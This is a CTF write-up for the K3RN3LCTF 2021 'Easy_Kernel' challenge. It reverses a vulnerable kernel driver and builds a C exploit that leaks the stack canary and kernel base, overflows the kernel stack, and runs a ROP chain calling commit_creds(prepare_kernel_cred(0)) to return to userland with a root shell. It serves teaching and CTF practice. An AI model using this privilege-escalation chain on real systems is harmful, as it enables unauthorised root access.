Easy_Kernel Writeup from K3RN3LCTF 2021

   

It’s been a while, huh?

Today, we will dive into the basics of Linux kernel exploitation. I am not very experienced with Linux kernel exploitation and I am still learning, so this post walks through the challenge I solved this weekend in K3RN3LCTF 2021.

First Look

First look of the Challenge

We have a bunch of files to work with. Let’s first understand what each file actually does.

  • bzImage - (short for "big zImage") the compressed Linux kernel.
  • fs - Uncompressed file system root directory for the VM.
  • initramfs.cpio.gz - Compressed file system for the VM.
  • launch.sh - Bash script to run the VM.
  • rebuild_fs.sh - Bash script to rebuild the compressed initramfs.cpio.gz from the “fs” folder.
  • vuln.ko - Vulnerable Linux kernel driver.

The first thing we need to do is figure out what’s going on in the Vulnerable Driver.

What is a kernel driver?

bruh moment

Before we dive into reverse engineering the kernel driver, let’s first understand what a Linux kernel driver is.

A Linux kernel driver is a specific type of program that allows hardware and software to work together to accomplish a task. Whenever you try to print a document, a kernel driver handles your request and sends it to the actual printer. It simply acts as a medium between the operating system and the hardware.

In Linux, a kernel driver typically registers a device file, which userland programs use to interact with the driver. For example, whenever you redirect some output to “/dev/null” you are interacting with a kernel driver.

Device files like this are called "character special devices".
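To make the idea of a character special device concrete, here is a minimal sketch that asks the kernel what kind of file a path is. The helper name is_char_device is my own and is only for illustration; it relies on nothing beyond the standard stat() call and the S_ISCHR macro.

```c
#include <sys/stat.h>

/* Returns 1 if `path` is a character special device, 0 if it is some
 * other kind of file, and -1 if stat() fails (for example, the path
 * does not exist). The helper name is hypothetical. */
int is_char_device(const char *path) {
    struct stat st;

    if (stat(path, &st) != 0) {
        return -1;
    }
    return S_ISCHR(st.st_mode) ? 1 : 0;
}
```

Calling is_char_device("/dev/null") on a normal Linux system should report a character device, while a regular directory such as "/" should not.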

Okay, but how do I interact with a kernel driver?

Your userland program can interact with the kernel driver by first getting a handle to it. Now, with that handle you can do read/write/ioctl syscalls to read and write data from the driver.

Example:

#include <fcntl.h>
#include <unistd.h>

int get_random_bytes(){

    /* get handle to /dev/urandom */
    int fd = open("/dev/urandom", O_RDONLY);
    int random_bytes = 0;

    /* read random bytes into the stack variable */
    read(fd, &random_bytes, sizeof(random_bytes));

    /* release the handle */
    close(fd);

    /* return random bytes */
    return random_bytes;
}

The above function interacts with the driver for “/dev/urandom” to get some random bytes.

So each kernel driver implements a bunch of device functions like -

  • device_open - called whenever a program tries to open the device using SYS_open.
  • device_read - called whenever a program does a SYS_read on the device’s fd.
  • device_write - called whenever a program does a SYS_write on the device’s fd.
  • device_release - called whenever a program does a SYS_close on the device’s fd.

If you are not familiar with Linux kernels, please skim through this cool article. The gist is that you interact with the driver by making syscalls.

Now let’s try to reverse engineer what the vulnerable driver is doing.

Reversing Vuln.ko

Okay, let’s open the driver in IDA Pro. A kernel driver does not have a main function, so we have to reverse the individual device functions.

function list

Let’s start with the sopen function.

sopen

open_function

This function just prints “Device opened”.

sread

read_function

This function writes the string “Welcome to this kernel pwn series” into a variable on the kernel stack, and then copies nbytes bytes from it to the userland buffer with the copy_user_generic_unrolled() function.

What this means is that if we did a SYS_read on the device’s fd, we would get the string “Welcome to this kernel pwn series\x00” in our buffer.

One thing to note here is that the user controls how many bytes to read, and the memory being copied is the kernel stack. This is a memory leak vulnerability, because the user can read an arbitrary number of bytes from the kernel stack, which may contain kernel pointers.

So, we mark the sread function as vulnerable and move on to the next function.
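The over-read can be modeled safely in userland. The sketch below is a toy: the struct fake_frame, its sizes, and both helper names are my own assumptions and do not reflect the real sread stack layout. It only shows why an unchecked length hands back whatever sits after the message buffer.

```c
#include <stdint.h>
#include <string.h>

/* Toy stand-in for the sread stack frame: a message buffer followed by
 * values that should stay secret. Layout and sizes are illustrative. */
struct fake_frame {
    char     message[64];
    uint64_t cookie;
    uint64_t saved_ret;
};

/* Mimics the bug: copies `nbytes` starting at the message buffer without
 * checking that the request stays inside it. The clamp to the struct
 * size exists only to keep this demo within defined behaviour. */
size_t leaky_read(const struct fake_frame *frame, void *out, size_t nbytes) {
    if (nbytes > sizeof(*frame)) {
        nbytes = sizeof(*frame);
    }
    memcpy(out, frame, nbytes);
    return nbytes;
}

/* Pulls a 64-bit value out of the leaked bytes at a byte offset. */
uint64_t leak_u64(const void *leak, size_t offset) {
    uint64_t value;

    memcpy(&value, (const char *)leak + offset, sizeof(value));
    return value;
}
```

Asking for only the length of the message returns just the string; asking for more returns the cookie and saved return address as well, which is the same shape of leak we will use against the driver.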

swrite

write_function

This function copies data from the userland buffer into a variable on the kernel stack. The copy only happens if nbytes is smaller than MaxBuffer, which is a global variable in the driver. nbytes is again user controlled, so if MaxBuffer can be raised above the size of the stack buffer, this becomes a kernel stack buffer overflow vulnerability.

The bounds check compares nbytes against MaxBuffer, which is initialized to 0x40.

ioctl_function

The buffer size is 128 bytes and MaxBuffer is only 0x40, so we cannot send more than 0x40 bytes. If we could modify MaxBuffer in some way, we might be able to corrupt the stack.

sioctl

ioctl_function

This function is special: it is invoked when the user makes a SYS_ioctl syscall, which allows you to send commands to the kernel driver.

In the sioctl function above you can see there are only 2 commands.

  • #16 - just prints the value you pass to it.
  • #32 - sets the global variable MaxBuffer to the value you pass to it.

If you remember, MaxBuffer is the cap on the number of bytes we can write to the kernel stack in the swrite function. By using this ioctl we can modify the value of MaxBuffer, which enables us to corrupt the stack.
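Putting swrite and sioctl together, the logic can be modeled in plain userland C. This is a reconstruction from the description above, not the decompiled driver: the function names, the return codes, and the exact comparison operator in the check are assumptions.

```c
#include <stddef.h>

#define STACK_BUF_SIZE 128  /* size of the swrite stack buffer, per the text */
#define CMD_PRINT      16   /* ioctl command that only prints its argument */
#define CMD_SET_MAX    32   /* ioctl command that overwrites MaxBuffer */

static size_t max_buffer = 0x40;  /* models the MaxBuffer global */

/* Models sioctl: command 32 replaces the cap with a caller-chosen value. */
long model_ioctl(unsigned int cmd, size_t arg) {
    if (cmd == CMD_SET_MAX) {
        max_buffer = arg;
    }
    return 0;
}

/* Models the check in swrite. Returns -1 if the write is rejected,
 * 0 if it is accepted and fits in the buffer, and 1 if it is accepted
 * but overflows the buffer. Whether the real check is > or >= is an
 * assumption here. */
int model_write(size_t nbytes) {
    if (nbytes > max_buffer) {
        return -1;
    }
    return nbytes > STACK_BUF_SIZE ? 1 : 0;
}
```

With the default cap, a 0x400-byte write is rejected. After model_ioctl(CMD_SET_MAX, 0x1000), the same write passes the check and runs past the 128-byte buffer.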

Writing your first Kernel Exploit

I will be using musl libc instead of glibc. In kernel exploitation challenges the author sometimes does not let you upload the exploit in a sane way, so you have to send it using the base64 encode -> paste into a file -> base64 decode method. It helps when the total size of the binary is small.

I was using glibc for this challenge initially, but after completing the exploit I was not able to upload the binary because the session timed out before I could finish pasting the base64 encoded text.

Before we start writing the exploit, we first need a few helper functions that will come in handy while debugging.

This is the exploit template I used.

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <stdint.h>
#include <string.h>
#include <fcntl.h>
#include <signal.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/ioctl.h>

#if HAVE_STROPTS_H
#include <stropts.h>
#endif

char exploit[0x1000]; /* exploit buffer */
uint64_t counter = 0; /* write offset into the exploit buffer */
int fd = 0;           /* file descriptor for pwn_device */

unsigned long user_cs, user_ss, user_rflags, user_sp;

/* save the userland segment registers, flags and stack pointer
   so that we can restore them when returning from the kernel */
void save_state(){
    __asm__(
        ".intel_syntax noprefix;"
        "mov user_cs, cs;"
        "mov user_ss, ss;"
        "mov user_sp, rsp;"
        "pushf;"
        "pop user_rflags;"
        ".att_syntax;"
    );
    puts("[*] Saved state");
}

void get_shell(void){
    puts("[*] Returned to userland");
    if (getuid() == 0){
        printf("[*] UID: %d, got root!\n", getuid());
        system("/bin/sh");
    } else {
        printf("[!] UID: %d, didn't get root\n", getuid());
        exit(-1);
    }
}

/* print a classic 16-bytes-per-row hex + ascii dump */
void hexdump(const void* data, size_t size) {
    char ascii[17];
    size_t i, j;
    ascii[16] = '\0';
    for (i = 0; i < size; ++i) {
        printf("%02X ", ((unsigned char*)data)[i]);
        if (((unsigned char*)data)[i] >= ' ' && ((unsigned char*)data)[i] <= '~') {
            ascii[i % 16] = ((unsigned char*)data)[i];
        } else {
            ascii[i % 16] = '.';
        }
        if ((i+1) % 8 == 0 || i+1 == size) {
            printf(" ");
            if ((i+1) % 16 == 0) {
                printf("|  %s \n", ascii);
            } else if (i+1 == size) {
                ascii[(i+1) % 16] = '\0';
                if ((i+1) % 16 <= 8) {
                    printf(" ");
                }
                for (j = (i+1) % 16; j < 16; ++j) {
                    printf("   ");
                }
                printf("|  %s \n", ascii);
            }
        }
    }
}

/* print the buffer as a column of 64-bit words with their offsets */
void telescope(char * buffer, int size){
    size = size - (size % 8);
    for (int i = 0; i < size; i+=8){
        printf("[0x%.3x] 0x%.16lx\n", i, *(uint64_t *)&buffer[i]);
    }
}

/* append len copies of byte a to the exploit buffer */
int s08(char a, int len){
    for (int i = 0; i < len; i++){
        exploit[counter + i] = a;
    }
    counter += len;
    return len;
}

/* append one 64-bit value to the exploit buffer */
int s64(uint64_t val){
    *(uint64_t *)(exploit + counter) = val;
    counter += 8;
    return counter;
}

int pwn(){

    save_state();

    /* your exploit here */


    /*                   */

    return 0;
}

int main(){
    return pwn();
}

Okay, first let’s create a function which will get the handle to the vulnerable device. In this challenge the vulnerable driver is in “/proc/pwn_device”.

void get_device(){
    fd = open("/proc/pwn_device", O_RDWR);
    if (fd < 0){
        puts("[!] Failed to open device");
    } else {
        puts("[*] Opened device");
    }
}

We can call this function inside the pwn() to get the file descriptor. Now let’s try to read from the driver and let’s see if we receive the “Welcome to this kernel pwn series” string or not.

int pwn(){

    save_state(); /* saves useful registers */
    get_device(); /* opens the driver */

    char buffer[0x100] = {0};
    read(fd, buffer, 0x100); /* read into buffer */
    puts(buffer); /* print everything we read */

    return 0;
}

Just put this pwn function in your exploit.c and then build it. For building the exploit I use a Makefile.

all:
	musl-gcc -O3 -static exploit.c -o fs/exploit

Now we need to run make in a terminal to build the exploit and then use the rebuild_fs.sh script to rebuild the initramfs.

build commands

Now we can run the VM to test our exploit using “./launch.sh”. Once in the VM, you can run the exploit by running “/exploit”.

build commands

Okay, our read syscall returned the string, which is perfect. Let’s try crashing the kernel by corrupting the stack.

Before we can overwrite important stuff on the stack, we need to bypass the bounds check that compares nbytes to MaxBuffer.

To bypass the check we need to make an ioctl syscall and send the new value of MaxBuffer with command #32. Now, we can send a bunch of “A”s to see if a kernel bruh moment happens or not.

int pwn(){

    save_state(); /* saves useful registers */
    get_device(); /* opens the driver */

    ioctl(fd, 32, sizeof(exploit)); /* raise MaxBuffer */

    memset(exploit, 'A', sizeof(exploit));
    write(fd, exploit, sizeof(exploit)); /* smash the kernel stack */
    return 0;
}

Running the exploit leads to a kernel panic because we corrupted the stack canary.

kernel bruh moment

RIP Control

The reason for kernel panic in the above picture is that we corrupted the stack cookie and not the actual return address.

How do we leak the cookie? Remember we have a memory leak vulnerability in sread? We can use that bug to leak the stack cookie.

I will use the gdb-gef gdb plugin because it’s faster than my other favorite gdb plugin (pwndbg). We also need the uncompressed vmlinux file extracted from the compressed bzImage. To extract vmlinux I will use this script.

$ ./extract-vmlinux.sh ./bzImage > vmlinux
$ file ./vmlinux
vmlinux: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), ... stripped

For debugging I like a setup where I have both gdb and the VM open side by side.

kernel bruh moment

Also for debugging, I edited the “fs/init” file to give us root access on the VM, and I disabled KASLR in “./launch.sh”.

The first thing you may want to do is comment out the 12th line in fs/init to get root access on the VM. To enable the gdbserver in qemu-system-x86_64 you must add the “-s” flag in “./launch.sh”. To disable KASLR you must replace “kaslr” with “nokaslr” in “./launch.sh”.

Modified “fs/init”:

 1#!/bin/sh
 2
 3mount -t proc none /proc
 4mount -t sysfs none /sys
 5mount -t 9p -o trans=virtio,version=9p2000.L,nosuid hostshare /home/ctf
 6
 7insmod /vuln.ko
 8
 9chown root /flag.txt
10chmod 700 /flag.txt
11
12# exec su -l ctf # comment me to gain root
13/bin/sh

Modified “./launch.sh”:

#!/bin/bash

SCRIPT_DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" &> /dev/null && pwd )"

/usr/bin/qemu-system-x86_64 \
    -s \
    -m 64M \
    -cpu kvm64,+smep,+smap \
    -kernel $SCRIPT_DIR/bzImage \
    -initrd $SCRIPT_DIR/initramfs.cpio.gz \
    -nographic \
    -monitor none \
    -append "console=ttyS0 nokaslr quiet panic=1" \
    -no-reboot

Now qemu-system-x86_64 is running in debug mode. You can attach to the kernel from gdb by running “target remote :1234”.

You can get the addresses of functions in the driver by grepping “/proc/kallsyms”. If you don’t have root access on the VM, all the addresses will be 0s, so you must have root access to get the real addresses.

This is what you will see when you don’t have root access.

without root

This is what you will see when you have root access.

root

Now that we have the addresses and we also have disabled KASLR, we can easily debug the kernel.
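If you would rather pull an address out of “/proc/kallsyms” from C than grep for it by hand, a line can be parsed as sketched below. The helper name parse_kallsyms_line is hypothetical, and the address in the usage note is made up for illustration. Each line has the form "address type name", optionally followed by the module name in brackets.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Parses one /proc/kallsyms line of the form "<hex addr> <type> <name> ...".
 * Returns 1 and stores the address if the symbol name equals `wanted`,
 * otherwise returns 0 and leaves *addr untouched. */
int parse_kallsyms_line(const char *line, const char *wanted, uint64_t *addr) {
    unsigned long long value;
    char type;
    char name[128];

    if (sscanf(line, "%llx %c %127s", &value, &type, name) != 3) {
        return 0;
    }
    if (strcmp(name, wanted) != 0) {
        return 0;
    }
    *addr = (uint64_t)value;
    return 1;
}
```

For example, feeding it a line such as "ffffffffc0000000 t sread [vuln]" with wanted set to "sread" stores 0xffffffffc0000000. Without root the same call succeeds but stores 0, which matches the zeroed addresses shown above.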

To leak the stack cookie, we will use the sread function to read 0x400 bytes back to us. So, first let’s set a breakpoint at sread.

breakpoint

I created a do_read() function which takes a buffer and number of bytes as argument and does the read syscall for you, and similarly other helper functions.

int do_read(char * buffer, int size){
    return read(fd, buffer, size);
}

int do_ioctl(int cmd, int arg){
    return ioctl(fd, cmd, arg);
}

int do_write(char * buffer, int size){
    return write(fd, buffer, size);
}


int pwn(){

    save_state(); /* saves useful registers */
    get_device(); /* opens the driver */

    /* leak stack_cookie */
    memset(exploit, 0, 0x1000);
    do_read(exploit, 0x400);

    telescope(exploit, 0x400);

    return 0;
}

After setting the breakpoint, you can continue execution and run the exploit in the VM.

Once the breakpoint is hit, inspect the Kernel Stack to see if you can spot the stack cookie. In the below screenshot you can see the stack cookie is placed on the stack.

cookie

In this screenshot you can see the layout of the stack.

stack layout for sread

The telescope() function prints the leaked stack in hex format. This is the output we get.

telescope

So you can see we are able to leak the stack cookie at offsets 0x70 and 0x80. You can also see that we are able to leak a kernel pointer at offset 0x90, and with this leak we can bypass KASLR.

We have disabled KASLR, so for us the kernel base address is 0xffffffff81000000. Subtracting the kernel base address from the leaked value gives the offset of this kernel pointer, which is 0x23e347. From the kernel base we can also calculate the addresses of crucial functions like commit_creds and prepare_kernel_cred. We will discuss these functions further when we construct our ROP chain. So, we add this to our pwn() function.

    uint64_t stack_cookie = *(uint64_t *)&exploit[0x80];
    uint64_t kernel_base  = *(uint64_t *)&exploit[0x90] - 0x23e347;
    uint64_t commit_creds = kernel_base + 0x87e80;
    uint64_t prepare_kernel_cred = kernel_base + 0x881c0;

    printf("[+] Stack Cookie : 0x%.16lx\n", stack_cookie);
    printf("[+] Kernel Base  : 0x%.16lx\n", kernel_base);
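The base calculation is easy to get wrong when the stack layout shifts, so it can help to wrap it in a helper that rejects implausible results. This is a minimal sketch under my own assumptions: the helper name is hypothetical, and the 1 MiB alignment test is a deliberately loose sanity check rather than the kernel's exact KASLR granularity.

```c
#include <stdint.h>

#define LEAK_OFFSET 0x23e347ULL  /* leaked pointer minus kernel base, from the text */

/* Returns the kernel base implied by the pointer leaked at offset 0x90,
 * or 0 if the result does not look like a kernel text base. */
uint64_t kernel_base_from_leak(uint64_t leaked_ptr) {
    uint64_t base = leaked_ptr - LEAK_OFFSET;

    /* On x86-64 the kernel image is mapped in the top 2 GiB. */
    if (base < 0xffffffff80000000ULL) {
        return 0;
    }
    /* A base that is not even 1 MiB aligned suggests we read the wrong
     * stack slot (loose check, chosen for this sketch). */
    if ((base & 0xfffffULL) != 0) {
        return 0;
    }
    return base;
}
```

With KASLR disabled the leaked value is 0xffffffff81000000 + 0x23e347, so the helper returns 0xffffffff81000000. With KASLR enabled it returns whatever slid base the leak implies.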

This is what it looks like when you run the exploit now.

leak

Now we can move on to writing a ROP chain, but before we talk about that we must know what we can do to gain root privileges.

prepare_kernel_cred and commit_creds

The kernel tracks the user privileges (and other data) of every running process in the task_struct structure.

struct task_struct {
    struct thread_info      thread_info;

    /* -1 unrunnable, 0 runnable, >0 stopped: */
    volatile long           state;

    void                    *stack;
    atomic_t                usage;
    // ...
    int                     prio;
    int                     static_prio;
    int                     normal_prio;
    unsigned int            rt_priority;

    struct sched_info       sched_info;

    struct list_head        tasks;

    pid_t                   pid;
    pid_t                   tgid;

    /* Process credentials: */

    /* Objective and real subjective task credentials (COW): */
    const struct cred __rcu  *real_cred;

    /* Effective (overridable) subjective task credentials (COW): */
    const struct cred __rcu  *cred;
    // ...
};

In this task_struct structure we have the process credentials which hold the effective user id.

struct cred {
    atomic_t    usage;
    kuid_t      uid;        /* real UID of the task */
    kgid_t      gid;        /* real GID of the task */
    kuid_t      suid;       /* saved UID of the task */
    kgid_t      sgid;       /* saved GID of the task */
    kuid_t      euid;       /* effective UID of the task */
    kgid_t      egid;       /* effective GID of the task */
    kuid_t      fsuid;      /* UID for VFS ops */
    kgid_t      fsgid;      /* GID for VFS ops */
    unsigned    securebits; /* SUID-less security management */
    kernel_cap_t    cap_inheritable; /* caps our children can inherit */
    kernel_cap_t    cap_permitted;   /* caps we're permitted */
    kernel_cap_t    cap_effective;   /* caps we can actually use */
    kernel_cap_t    cap_bset;        /* capability bounding set */
    kernel_cap_t    cap_ambient;     /* Ambient capability set */
    // ...
};

For the root user the effective user id is 0. In other words, if we can change the value of current_task->cred->euid to 0, then the current process will become root. After setting the effective user id of the current process to zero, we have to safely return to userland, and only then will we be able to get a root shell.

Let’s also discuss the mitigations implemented in the Linux kernel.

  1. Kernel Address Space Layout Randomization (KASLR) - it randomizes the base address of the kernel each time the system is rebooted.

  2. Kernel Stack Cookies (CANARIES) - Mitigation to protect against stack based buffer overflow attacks, exactly as in userland.

  3. Supervisor Mode Execution Protection (SMEP) - this feature marks all the userland pages in the page table as non-executable when the process is in kernel-mode. In the kernel, this is enabled by setting bit 20 of control register CR4.

  4. Supervisor Mode Access Prevention (SMAP) - this feature marks all the userland pages in the page table as non-accessible when the process is in kernel-mode, which means they cannot be read or written either. In the kernel, this is enabled by setting bit 21 of control register CR4.

  5. Kernel Page-Table Isolation (KPTI) - this feature separates user-space and kernel-space page tables entirely, instead of using just one set of page tables that contains both user-space and kernel-space addresses. One set of page tables includes both kernel-space and user-space addresses, same as before, but it is only used when the system is running in kernel mode. The second set of page tables, for use in user mode, contains a copy of user-space and a minimal set of kernel-space addresses.

(Ref. lkmidas.github.io)
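Since SMEP and SMAP are each a single bit in CR4, checking for them in a register dump (for example, the CR4 value printed in a kernel panic) comes down to two masks. The helper names below are my own, and the CR4 values in the usage note are illustrative rather than taken from this challenge.

```c
#include <stdint.h>

#define CR4_SMEP (1ULL << 20)  /* Supervisor Mode Execution Protection */
#define CR4_SMAP (1ULL << 21)  /* Supervisor Mode Access Prevention */

/* Returns 1 if the SMEP bit is set in the given CR4 value. */
int cr4_has_smep(uint64_t cr4) {
    return (cr4 & CR4_SMEP) != 0;
}

/* Returns 1 if the SMAP bit is set in the given CR4 value. */
int cr4_has_smap(uint64_t cr4) {
    return (cr4 & CR4_SMAP) != 0;
}

/* Returns the CR4 value an attacker would want to write in order to
 * switch both protections off, leaving every other bit untouched. */
uint64_t cr4_without_smep_smap(uint64_t cr4) {
    return cr4 & ~(CR4_SMEP | CR4_SMAP);
}
```

For a CR4 value of 0x3006f0 both checks return 1, and clearing the two bits leaves 0x6f0.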

We now understand that to gain a root shell we need to set current_task->cred->euid to 0. We can do it in 2 ways, the harder way or the easier way.

The harder way is to craft a ROP chain that gets the address of current_task, walks the individual members to reach the euid member, and then sets it to zero.

The easier way is to call the prepare_kernel_cred(struct task_struct * reference_task_struct) function with NULL as its argument. It returns a cred struct which has its euid set to 0, which is exactly what we want. But how do we apply this new cred struct to our process? We can do that by passing the returned cred struct to a function called commit_creds(struct cred * ). The credentials are supposed to be immutable (i.e., they can be cached elsewhere, and shouldn’t be updated in place). Instead, they can be replaced.

So, in theory we just do commit_creds(prepare_kernel_cred(0)); to get root privileges.

Give me root.

At this point, we have everything that we need. We have the kernel base, the kernel stack cookie, and the addresses of prepare_kernel_cred and commit_creds. Let’s get the root shell.

First let’s figure out the offset in the stack where we need to overwrite the stack cookie.

One way to figure it out is to look at the disassembly of the swrite function, where it writes the cookie to the stack.

cookie2

You can see it’s writing the cookie at an offset of 0x80. So, this is one way to figure it out. Another method is to send the output of pwn cyclic 0x400 to the kernel stack, see what value the cookie was overwritten with, and then calculate the offset of the cookie from the cyclic pattern.

You can use a similar method to figure out the offset of the return address.

The offset of the stack cookie turns out to be 0x80 and the offset of the return address turns out to be 0x90.

    int cookie_offset = 0x80/8;
    int return_offset = 0x90/8;

We divide the offsets by 8 so that they count 8-byte words, which is the unit each s64() call writes. The ROP chain code multiplies them by 8 again when it advances the byte counter into the exploit buffer.

So our ROP chain would look something like this:

    exploit = pwn.cyclic(0x80) # offset for cookie
    exploit += pwn.p64(stack_cookie)
    exploit += pwn.p64(0) # rbx
    exploit += pwn.p64(POP_RDI) # rdi = NULL
    exploit += pwn.p64(0)
    exploit += pwn.p64(prepare_kernel_cred)
    exploit += pwn.p64(MOV_RDI_RAX) # mov the returned cred structure
                                    # in rdi to be the argument for commit_creds
    exploit += pwn.p64(commit_creds)
    exploit += pwn.p64(somehow_return_to_userland_safely)

You can easily find the POP_RDI gadget, but a clean MOV_RDI_RAX gadget (“mov rdi, rax ; ret”) is hard to find. What you will find instead is this gadget:

    mov rdi, rax
    jne 0xffffffff813b34f1
    xor eax, eax
    ret

Right away you can notice an issue with this gadget, which is the jne instruction. The zero flag must be set so that we don’t take the jump and can safely return from the gadget. To do just that we have to find these gadgets:

    pop rdx
    ret

    cmp rdx, 8
    jne 0xffffffff81a3003e
    ret

Together, these two gadgets allow us to set the zero flag: we pop 8 into rdx, and the cmp then sets the zero flag because the operands are equal. We can chain them in front of the MOV_RDI_RAX gadget so that its jne is not taken.

Our new ROP chain would look like this:

    exploit = pwn.cyclic(0x80) # offset for cookie
    exploit += pwn.p64(stack_cookie)
    exploit += pwn.p64(0) # rbx
    exploit += pwn.p64(POP_RDI) # rdi = NULL
    exploit += pwn.p64(0)
    exploit += pwn.p64(prepare_kernel_cred)
    exploit += pwn.p64(POP_RDX)
    exploit += pwn.p64(8)
    exploit += pwn.p64(CMP_RDX_8)
    exploit += pwn.p64(MOV_RDI_RAX) # mov the returned cred structure
                                    # in rdi to be the argument for commit_creds
    exploit += pwn.p64(commit_creds)
    exploit += pwn.p64(somehow_return_to_userland_safely)

There is still one gadget missing, which is the “somehow_return_to_userland_safely” gadget. We will discuss that later; first let’s build this ROP chain in our exploit.

#define PAGE_SIZE           0x001000
#define POP_RAX             0x00dc1e /* pop rax ; ret */
#define POP_RDI             0x001518 /* pop rdi ; ret */
#define POP_RDX             0x034b72 /* pop rdx ; ret */
#define MOV_RDI_RAX         0x3b3504 /* mov rdi, rax ; jne 0xffffffff813b34f1 ; xor eax, eax ; ret */
#define CMP_RDX_8           0xa30061 /* cmp rdx, 8 ; jne 0xffffffff81a3003e ; ret */
#define SWAPGS_RESTORE      0xc00a45 /* swapgs_restore_regs_and_return_to_usermode + 22 */
#define PREPARE_KERNEL_CRED 0x0cc140 /* prepare_kernel_cred */
#define COMMIT_CREDS        0x0cbdd0 /* commit_creds */
#define KERN_BASE           0xffffffff81000000

/* ROP CHAIN */
counter += cookie_offset * 8;            /* skip to the stack cookie */
s64(stack_cookie);
counter += return_offset * 8 - counter;  /* skip to the return address */
s64(kernel_base + POP_RDI);
s64(0);
s64(prepare_kernel_cred);
s64(kernel_base + POP_RDX);
s64(0x8);
s64(kernel_base + CMP_RDX_8);
s64(kernel_base + MOV_RDI_RAX);
s64(commit_creds);
s64(0xdeadbeeff00dbabe);                 /* placeholder return address */

This exploit will crash the kernel because RIP will become 0xdeadbeeff00dbabe. We still don’t know how to safely return to the userland. If you just try to return to the get_shell function by replacing 0xdeadbeeff00dbabe with the address of get_shell, then this would happen.

cookie2

We triggered SMEP: we tried to execute userland code from the kernel. With SMEP enabled, all userland code is marked non-executable while in kernel mode. To bypass this we could craft a ROP chain that clears bit 20 of the CR4 register, and only then go back to userland. But there is an easier way to go back to userland without triggering SMEP, SMAP or KPTI.

We have to use the swapgs_restore_regs_and_return_to_usermode gadget to switch back to userland safely. SWAPGS is an instruction that exchanges the current GS base with the value saved in the IA32_KERNEL_GS_BASE MSR, which restores the user’s GS before we return.

Specifically, the gadget starts from swapgs_restore_regs_and_return_to_usermode + 22. This is what the gadget does.

cookie2

You can see that at address 0xffffffff81c00aa8 this gadget pops values into rax and rdi. So, we will add 2 NULLs to our ROP chain after this gadget.

IRETQ is an interrupt return instruction which pops RIP, CS, RFLAGS, SP and SS, in that order. So, in our ROP chain we simply add them after our swapgs_restore_regs_and_return_to_usermode gadget.
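The order of those five values matters, so it can be clearer to describe the frame as a struct rather than as five loose writes. This is a sketch with names of my own choosing (struct iret_frame and put_iret_frame are hypothetical); the fields are listed in the order iretq pops them, lowest address first.

```c
#include <stdint.h>
#include <string.h>

/* The five values iretq pops, in the order they sit on the stack. */
struct iret_frame {
    uint64_t rip;     /* where execution resumes in userland */
    uint64_t cs;      /* saved user code segment */
    uint64_t rflags;  /* saved user flags */
    uint64_t rsp;     /* saved user stack pointer */
    uint64_t ss;      /* saved user stack segment */
};

/* Copies the frame into `chain` at byte offset `off` and returns the
 * offset just past it. The caller must make sure the buffer has room
 * for the 40 bytes being written. */
size_t put_iret_frame(unsigned char *chain, size_t off,
                      const struct iret_frame *frame) {
    memcpy(chain + off, frame, sizeof(*frame));
    return off + sizeof(*frame);
}
```

In the exploit, the fields would be filled from get_shell and the values captured by save_state(), and the frame would be placed right after the two NULLs that follow the swapgs gadget.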

This is what our final ROP chain looks like.

    memset(exploit, '\0', 0x1000);
    /* ROP CHAIN */
    counter += cookie_offset * 8;
    s64(stack_cookie);
    counter += return_offset * 8 - counter;
    s64(kernel_base + POP_RDI);
    s64(0);
    s64(prepare_kernel_cred);
    s64(kernel_base + POP_RDX);
    s64(0x8);
    s64(kernel_base + CMP_RDX_8);
    s64(kernel_base + MOV_RDI_RAX);
    s64(commit_creds);
    s64(kernel_base + SWAPGS_RESTORE);
    s64(0); /* pop rax */
    s64(0); /* pop rdi */
    s64((uint64_t)get_shell); /* iretq: rip */
    s64(user_cs);             /* iretq: cs */
    s64(user_rflags);         /* iretq: rflags */
    s64(user_sp);             /* iretq: rsp */
    s64(user_ss);             /* iretq: ss */

    /* TRIGGER BUG AND GET ROOT */
    do_write((char *)exploit, 0x800);

Let’s fire this exploit and see what happens.

cookie2

You can find the full exploit here